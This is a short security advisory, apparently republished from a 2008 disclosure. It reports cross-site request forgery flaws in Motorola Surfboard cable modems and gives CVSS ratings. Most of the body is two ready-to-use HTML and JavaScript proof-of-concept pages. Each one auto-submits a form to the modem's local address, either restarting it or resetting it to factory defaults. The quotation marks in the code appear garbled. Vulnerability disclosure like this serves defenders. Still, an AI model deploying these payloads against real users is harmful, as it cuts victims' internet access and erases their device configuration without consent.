Sea-Surfing on the Motorola Surfboard

2008.04.30
Credit: th3 r00k
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 7.8/10
Impact Subscore: 7.8/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: Complete

More information about this flaw can be found here: http://www.rooksecurity.com/blog/?p=4 Motorola Surfboard Cable Modems suffer from two Denial of Service attacks by means of Cross Site Request Forgery. The latest version of The Motorola Surfboard is affected at the time of the writing. Restarts the modem: <html> <form id=1 method=post action=?http://192.168.100.1/configdata.html?> <input name=?BUTTON_INPUT? value=?Restart+Cable+Modem?> </form> <html> <script> document.getElementById(1).submit(); </script> This CSRF will disconnect the user from the internet for longer. ?The process to get back online from a factory default condition could take from 5 to 30 minutes.? <html> <form id=2 method=post action=?http://192.168.100.1/configdata.html?> <input name=?BUTTON_INPUT? value=?Reset+All+Defaults?> </form> <html> <script> document.getElementById(2).submit(); </script> Peace


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top